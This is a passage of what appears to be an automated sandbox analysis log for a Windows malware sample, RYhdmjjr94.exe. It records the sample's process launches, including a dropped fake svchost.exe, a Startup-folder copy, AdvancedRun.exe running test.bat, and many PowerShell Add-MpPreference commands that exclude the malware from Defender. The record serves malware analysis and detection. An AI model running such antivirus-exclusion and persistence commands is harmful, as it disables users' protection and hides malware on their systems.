                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe'
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2188
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /SpecialRun 4101d8 5136
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 7004 -ip 7004
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /SpecialRun 4101d8 3132
                Source: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /SpecialRun 4101d8 4888
                Source: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /SpecialRun 4101d8 7052
                Source: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /SpecialRun 4101d8 7032
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
                Source: RYhdmjjr94.exe, 00000000.00000000.419511219.00000000010A0000.00000002.00020000.sdmp, explorer.exe, 00000025.00000000.391075697.0000000005EA0000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: RYhdmjjr94.exe, 00000000.00000000.419511219.00000000010A0000.00000002.00020000.sdmp, explorer.exe, 00000025.00000000.427060111.0000000001640000.00000002.00020000.sdmpBinary or memory string: Progman
                Source: RYhdmjjr94.exe, 00000000.00000000.419511219.00000000010A0000.00000002.00020000.sdmp, explorer.exe, 00000025.00000000.427060111.0000000001640000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                Source: explorer.exe, 00000025.00000000.425382914.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
                Source: RYhdmjjr94.exe, 00000000.00000000.419511219.00000000010A0000.00000002.00020000.sdmp, explorer.exe, 00000025.00000000.427060111.0000000001640000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                Source: RYhdmjjr94.exe, 00000000.00000000.419511219.00000000010A0000.00000002.00020000.sdmp, explorer.exe, 00000025.00000000.427060111.0000000001640000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeQueries volume information: C:\Users\user\Desktop\RYhdmjjr94.exe VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
